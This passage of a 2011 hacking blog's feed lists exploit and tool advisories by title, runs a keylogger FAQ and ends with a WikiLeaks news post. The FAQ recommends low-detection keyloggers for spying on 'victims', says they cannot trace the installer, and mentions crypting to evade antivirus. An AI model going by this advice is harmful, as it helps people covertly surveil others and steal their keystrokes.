&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97961/oath-toolkit-1.4.5.tar.gz&quot; title=&quot;The OATH Toolkit attempts to collect several tools that are useful when deploying technologies related to OATH, such as HOTP one-time passwords. It is a fork of the earlier HOTP Toolkit.&quot;&gt;OATH Toolkit 1.4.5&lt;/a&gt;&lt;/span&gt;  - The OATH Toolkit attempts to collect several tools that are useful  when deploying technologies related to OATH, such as HOTP one-time  passwords. It is a fork of the earlier HOTP Toolkit.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97812/netbios-shares-scanner-0.2.zip&quot; title=&quot;This Python script is a tool that can be used to check windows workstations and servers if they have accessible shared resources.&quot;&gt;Netbios Share Scanner 0.2&lt;/a&gt;&lt;/span&gt;  - This Python script is a tool that can be used to check windows  workstations and servers if they have accessible shared resources.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97736/malmon-0.1b.tar.gz&quot; title=&quot;Malmon is a real-time exploit/backdoor detection tool for Linux that audits the integrity of files in a given directory.&quot;&gt;Malmon Detection Tool 0.1b&lt;/a&gt;&lt;/span&gt; - Malmon is a real-time exploit/backdoor detection tool for Linux that audits the integrity of files in a given directory.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97695/tor.uclibc.x86_64.20110119.iso&quot; title=&quot;Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose only purpose is to host a Tor server in an environment that maximizes security and privacy. Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. Security is enhanced&quot;&gt;Tor-ramdisk i686 UClibc-based Linux Distribution x86_64 20110119&lt;/a&gt;&lt;/span&gt;  - Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose  only purpose is to host a Tor server in an environment that maximizes  security and privacy. Tor is a network of virtual tunnels that allows  people and groups to improve their privacy and security on the Internet.  Security is enhanced by employing a monolithically compiled GRSEC/PAX  patched kernel and hardened system tools. Privacy is enhanced by turning  off logging at all levels so that even the Tor operator only has access  to minimal information. Finally, since everything runs in ephemeral  memory, no information survives a reboot, except for the Tor  configuration file and the private RSA key which may be  exported/imported by FTP. x86 version.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97694/tor.uclibc.x86.20110119.iso&quot; title=&quot;Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose only purpose is to host a Tor server in an environment that maximizes security and privacy. Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. Security is enhanced&quot;&gt;Tor-ramdisk i686 UClibc-based Linux Distribution x86 20110119&lt;/a&gt;&lt;/span&gt;  - Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose  only purpose is to host a Tor server in an environment that maximizes  security and privacy. Tor is a network of virtual tunnels that allows  people and groups to improve their privacy and security on the Internet.  Security is enhanced by employing a monolithically compiled GRSEC/PAX  patched kernel and hardened system tools. Privacy is enhanced by turning  off logging at all levels so that even the Tor operator only has access  to minimal information. Finally, since everything runs in ephemeral  memory, no information survives a reboot, except for the Tor  configuration file and the private RSA key which may be  exported/imported by FTP. x86 version.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;h3&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif; font-size: small;&quot;&gt;Packetstorm Exploits&lt;/span&gt;&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98019/cmswebmanagerpro-xsrfexec.txt&quot; title=&quot;CMS WebManager-Pro version 7.4.3 suffers from code execution and cross site request forgery vulnerabilities.&quot;&gt;CMS WebManager-Pro 7.4.3 Code Execution / Cross Site Request Forgery&lt;/a&gt;&lt;/span&gt; - CMS WebManager-Pro version 7.4.3 suffers from code execution and cross site request forgery vulnerabilities.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98018/joomlaclanmembers-sql.txt&quot; title=&quot;The Joomla Clan Members component suffers from a remote SQL injection vulnerability.&quot;&gt;Joomla Clan Members SQL Injection&lt;/a&gt;&lt;/span&gt; - The Joomla Clan Members component suffers from a remote SQL injection vulnerability.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98011/aol95rtx-overflow.txt&quot; title=&quot;AOL version 9.5 suffers from a .rtx buffer overflow vulnerability.&quot;&gt;AOL 9.5 .rtx Local Buffer Overflow&lt;/a&gt;&lt;/span&gt; - AOL version 9.5 suffers from a .rtx buffer overflow vulnerability.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98010/netzip-overflow.txt&quot; title=&quot;NetZip Classic version 7.5.1.86 suffers from a buffer overflow vulnerability.&quot;&gt;NetZip Classic Buffer Overflow&lt;/a&gt;&lt;/span&gt; - NetZip Classic version 7.5.1.86 suffers from a buffer overflow vulnerability.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98032/joomlavirtuemart116-sql.txt&quot; title=&quot;Joomla VirtueMart component versions 1.1.6 and below suffer from a remote blind SQL injection vulnerability.&quot;&gt;Joomla VirtueMart 1.1.6 Blind SQL Injection&lt;/a&gt;&lt;/span&gt; - Joomla VirtueMart component versions 1.1.6 and below suffer from a remote blind SQL injection vulnerability.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98005/esyndicatds-xss.txt&quot; title=&quot;eSyndiCat Directory Software versions 2.2 and 2.3 suffer from a cross site scripting vulnerability.&quot;&gt;eSyndiCat Directory Software Cross Site Scripting&lt;/a&gt;&lt;/span&gt; - eSyndiCat Directory Software versions 2.2 and 2.3 suffer from a cross site scripting vulnerability.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98026/sdpdownloaderhr-overflow.txt&quot; title=&quot;SDP Downloader http_response remote buffer overflow exploit.&quot;&gt;SDP Downloader Buffer Overflow&lt;/a&gt;&lt;/span&gt; - SDP Downloader http_response remote buffer overflow exploit.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98002/joomlafrontend-lfi.txt&quot; title=&quot;The Joomla Front End User Access component suffers from a local file inclusion vulnerability.&quot;&gt;Joomla Front End User Access Local File Inclusion&lt;/a&gt;&lt;/span&gt; - The Joomla Front End User Access component suffers from a local file inclusion vulnerability.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98024/harvard-lfi.txt&quot; title=&quot;www.hcs.harvard.edu appears to suffer from a local file inclusion vulnerability.&quot;&gt;Harvard.edu Local File Inclusion&lt;/a&gt;&lt;/span&gt; - www.hcs.harvard.edu appears to suffer from a local file inclusion vulnerability.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/98027/maxthon3020-dos.txt&quot; title=&quot;Maxthon Browser version 3.0.20.1000 .ref .replace denial of service exploit.&quot;&gt;Maxthon Browser 3.0.20.1000 Denial Of Service&lt;/a&gt;&lt;/span&gt; - Maxthon Browser version 3.0.20.1000 .ref .replace denial of service exploit.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;h3&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif; font-size: small;&quot;&gt;Securiteam Exploits&lt;/span&gt;&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.securiteam.com/securitynews/5CP3V0035I.html&quot; title=&quot;This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec Web Gateway.&quot;&gt;Symantec Web Gateway Management Interface USERNAME Blind SQL Injection Vulnerability&lt;/a&gt;&lt;/span&gt; - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec Web Gateway.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.securiteam.com/securitynews/5XP3Q0035Y.html&quot; title=&quot;Remote execution of arbitrary code, disclosure of information and other vulnerabilities affecting HP-UX.&quot;&gt;HP-UX Running Java Runtime Environment (JRE) or Java Developer Kit (JDK) Multiple Vulnerabilities&lt;/a&gt;&lt;/span&gt; - Remote execution of arbitrary code, disclosure of information and other vulnerabilities affecting HP-UX.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.securiteam.com/securitynews/5ZP3L1P35O.html&quot; title=&quot;This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of RealNetworks RealPlayer.&quot;&gt;RealNetworks RealPlayer MLTI Stream Number Code Execution Vulnerability&lt;/a&gt;&lt;/span&gt; - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of RealNetworks RealPlayer.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.securiteam.com/securitynews/5EP3M0U35I.html&quot; title=&quot;This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.&quot;&gt;Apple QuickTime PICT File PackBits Code Execution Vulnerability&lt;/a&gt;&lt;/span&gt; - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;span class=&quot;rssLinkListItemTitle&quot;&gt;&lt;a href=&quot;http://www.securiteam.com/securitynews/5DP3L0U35I.html&quot; title=&quot;This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime.&quot;&gt;Apple QuickTime PICT directBitsRect Pack3 Code Execution Vulnerability&lt;/a&gt;&lt;/span&gt; - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;blockquote&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;FEEL FREE TO COMMENT....&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2011/02/hack-toolsexploits.html</link><author>noreply@blogger.com (Hackinverse)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfk0f0IEDEYjoSHfzKRGd5qBW_ajL0MzrVC2Z_ra8R8UdAwdIQbwXmDyz66MabipwFqmNufe82AHhBhx7XRSV-rGDlmDSVdd56TcXaEQlxsjP-7Pdk-5p9PmaNMqm6syjCItBccBVL46ym/s72-c/images+%25281%2529.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-4054835567056897391</guid><pubDate>Tue, 01 Feb 2011 16:48:00 +0000</pubDate><atom:updated>2011-02-01T22:18:25.047+05:30</atom:updated><title>KEY-LOGGERS FAQ</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhosxuvJQcsLImBxf4-9FH1BfRCWaOONsTGtbBkBx2mu0c7uwFjiVmjzrUtejHplud_p6NYzUmhYevA42hdPo83d_2XXmIyfPKMRuhOkJWV1HFs4aCUV1gniZhlB3pJ_yxRgtt4B-3trvKd/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;96&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhosxuvJQcsLImBxf4-9FH1BfRCWaOONsTGtbBkBx2mu0c7uwFjiVmjzrUtejHplud_p6NYzUmhYevA42hdPo83d_2XXmIyfPKMRuhOkJWV1HFs4aCUV1gniZhlB3pJ_yxRgtt4B-3trvKd/s200/images.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;A &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD10&quot;&gt;keylogger&lt;/span&gt; sometimes called a spying software is a small program which is used &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;to monitor&lt;/span&gt; a local or a &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;Remote PC&lt;/span&gt;, Keyloggers now a days are so easy to use that a person with even a basic knowledge of computers can use keylogger.Once a keylogger is installed in your computer it can monitor each and every &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD8&quot;&gt;keystroke&lt;/span&gt; typed on your computer, thus you can see how dangerous a keylogger can be.&lt;br /&gt;
&lt;b&gt;&lt;a href=&quot;&quot; name=&quot;more&quot;&gt;&lt;/a&gt;Types of Keylogger&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
There are two types of Keyloggers:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.Hardware keylogger&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;2.Software keylogger&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Hardware keyloggers are rarely used now a days since you can monitor a  Remote computer, Software keyloggers are the most widely used keyloggers  as some of them support remote installaiton which means that you can  monitor any computer anywhere in the World.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Can the victim detect it&#39;s presence once keylogger is installed in his/her computer?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Well it&#39;s really difficult for the victim to detect keylogger&#39;s presence as it runs in complete stealth mode, It hides it self from task manager, &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;startup&lt;/span&gt; etc&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Can I the victim trace you back?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Once the keylogger is installed, I think it&#39;s almost impossible for the victim to trace you back&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How can I protect my self from keylogger?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
A simple keylogger can be detected by even a lame antivirus, but  sometimes the attacker can use methods like Crypting,Binding,Hexing etc,  that make it harder for the Antivirus to detect the keylogger. So to counter that you should use a &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD9&quot;&gt;piece of&lt;/span&gt; software called sandboxie, &lt;b&gt;Sandboxie&lt;/b&gt; runs the choosen computer program in an Isolated space so if the file you receive is a keylogger, You need no to worry because it won&#39;t affect your other programs, Firefox users can use the free version of &lt;b&gt;keyscrambler&lt;/b&gt; which encrypts each and every keystrokes you type, so even if a keylogger is installed in your computer, You need not to worry as the attacker will receive the encrypted keystroke&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Which Keylogger is the best?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
With my experience of more than 4 years in the field of Ethical Hacking  and security I suggest only two keyloggers which I think are best and  have a comparatively low antivirus detection rate:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.Sniperspy&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;2.Winspy&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;How do I find if a file is binded with a keylogger?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Keylogger can be binded with almost any file so how do you know if the file is binded?, You can use Bintext or &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;Hex editor&lt;/span&gt; to find out, But &lt;b&gt;Bintext&lt;/b&gt; and Hex editing method do not work effectively if the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD2&quot;&gt;server&lt;/span&gt; is crypted so alternatively there is a great piece of software named asas &quot;&lt;b&gt;Resource hacker&lt;/b&gt;&quot; that can tell you if the file is binded or not&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;blockquote&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: magenta;&quot;&gt;&amp;gt;&amp;gt;FEEL FREE TO COMMENT&lt;/span&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: magenta;&quot;&gt;ANY MORE QUESTIONS..ASK US..&lt;/span&gt;&lt;/blockquote&gt;&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2011/02/key-loggers-faq.html</link><author>noreply@blogger.com (Hackinverse)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhosxuvJQcsLImBxf4-9FH1BfRCWaOONsTGtbBkBx2mu0c7uwFjiVmjzrUtejHplud_p6NYzUmhYevA42hdPo83d_2XXmIyfPKMRuhOkJWV1HFs4aCUV1gniZhlB3pJ_yxRgtt4B-3trvKd/s72-c/images.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-4080864279533372458</guid><pubDate>Thu, 16 Dec 2010 07:49:00 +0000</pubDate><atom:updated>2010-12-16T13:19:33.192+05:30</atom:updated><title>Wikileaks- will the whistle blower now blow India?</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/_u_FPbAGnpWc/TQnEgZWn6ZI/AAAAAAAAAJg/TIT1kjXx0Tw/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/_u_FPbAGnpWc/TQnEgZWn6ZI/AAAAAAAAAJg/TIT1kjXx0Tw/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;The dirty game is on both on the shelf and of the shelf.&lt;br /&gt;
With the arrest of wikileaks founder in London has arouse a&amp;nbsp;tremor both  in the cyberspace and in the real world . The whistle blower has really  brought u a big issue in front now. The website has brought out many  classified documents infront of public&amp;nbsp;&amp;nbsp;and exosed the other face of the  &quot;big brother&quot;.&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;WikiLeaks  has been under intense pressure since it began publishing some 250,000  secret U.S. diplomatic cables, with attacks on its websites and threats  against its founder, Julian Assange, who is now in a British jail  fighting extradition to Sweden on sex crime allegations.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 16px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw4cL650w7ZxrNFrnlRrrVdKvbWg_TjAzfkACKF4a6bNSrb127B6Vn47RjokeP9yxKEMCjnb2LG3lbK_kZSoyWQJ5fWWAl037fCYFuY4gC_Fba98FWO4PbEWculHyp6wPg9ZQfWFQ1BqM/s1600/julian.jpg&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw4cL650w7ZxrNFrnlRrrVdKvbWg_TjAzfkACKF4a6bNSrb127B6Vn47RjokeP9yxKEMCjnb2LG3lbK_kZSoyWQJ5fWWAl037fCYFuY4gC_Fba98FWO4PbEWculHyp6wPg9ZQfWFQ1BqM/s1600/julian.jpg&quot; /&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;The  Germany-based Wau Holland Foundation, which has described itself as  WikiLeaks&#39; main backer, on Thursday protested PayPal&#39;s decision to cut  ties with WikiLeaks and said about euro10,000 ($13,000) in donations had  been frozen.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;The  foundation rejected PayPal&#39;s allegation it was supporting illegal  activity and said its lawyer had demanded that PayPal restore access to  the account.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;WikiLeaks&#39;  payment processor, DataCell ehf, said it was preparing to sue Visa and  MasterCard over their refusal to process donations to WikiLeaks.  DataCell CEO Andreas Fink said he would seek damages from the U.S.  credit card companies, saying &quot;it is simply ridiculous to think  WikiLeaks has done anything criminal.&quot;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzfp3X-2zVd66Xc3z6ZZmFplVknboAd3vGlZn_N8La3k-sJ_8Oq20Mpxev6mJmFdPxWhvz876cAo1TjTXQyuvRZyCr7ThwYbkjQ4FxiF7l2X74sXHPRj5wlO9VemKRAYL2SLtQjhGOgLM/s1600/asasasa.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzfp3X-2zVd66Xc3z6ZZmFplVknboAd3vGlZn_N8La3k-sJ_8Oq20Mpxev6mJmFdPxWhvz876cAo1TjTXQyuvRZyCr7ThwYbkjQ4FxiF7l2X74sXHPRj5wlO9VemKRAYL2SLtQjhGOgLM/s1600/asasasa.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;Pillay  said if WikiLeaks had broken the law &quot;then this should be handled  through the legal system and not through pressure and intimidation.&quot;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;In the Netherlands, a 16-year-old boy suspected of being involved in digital attacks by Wikileaks supporters was arrested.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;The  flow of online support has also sparked some solidarity on the streets.  One pro-WikiLeaks protest in Australia sent about 250 demonstrators  into the streets of Brisbane, while in the central Pakistani city of  Multan, dozens took to the streets to burn U.S. and British flags to  protest Assange&#39;s detention.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;line-height: 18px; margin: 0px; padding: 0px 0px 1em;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: normal;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;h1 style=&quot;font-family: arial,verdana,sans-serif,FreeSans; font-size: 18px; margin: 0px; padding: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;u&gt;Will the next Wikileaks expose India&#39;s corrupt?&lt;/u&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div style=&quot;font-family: arial,verdana,sans-serif,FreeSans; font-size: 12px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 16px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit;&quot;&gt;While  Wikileaks did not say in its message what the third instalment of their  release would cover. However, a&amp;nbsp;Reuters despatch from Washington DC&amp;nbsp;  said that classified US diplomatic cables reporting corruption  allegations against foreign governments and leaders are expected to  feature in the official documents that Wikileaks plans to release. It  added:&quot;Three sources familiar with the US State Department cables held  by Wikileaks say the corruption allegations in them are major enough to  cause serious embarrassment for foreign governments and politicians  named in them. They said the release was expected next week, but it  could come earlier. The detailed, candid reports by US diplomats also  may create foreign policy complications for the administration of US  President Barack Obama.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span 